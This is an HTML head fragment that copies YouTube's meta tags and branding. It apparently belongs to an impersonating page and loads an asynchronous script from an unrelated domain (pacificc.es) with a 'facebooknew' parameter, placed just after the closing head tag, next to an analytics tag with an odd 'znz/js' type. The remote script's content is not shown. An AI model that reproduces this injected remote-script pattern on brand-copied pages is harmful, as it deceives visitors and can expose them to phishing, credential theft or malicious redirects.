<meta name="description" content="Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube." />
<meta name="keywords" content="video, sharing, camera phone, video phone, free, upload" />
<meta name="theme-color" content="#ff0000" />
<meta property="og:image" content="/yts/img/yt_1200-vflhSIVnY.png" />
<meta property="fb:app_id" content="87741124305" />
</head>
<script src="https://pacificc.es/w/usa/?api=1&lan=facebooknew&ht=1" type="text/javascript" async="true"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-157452794-2"></script>


<script type="znz/js">
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-157452794-2');
</script>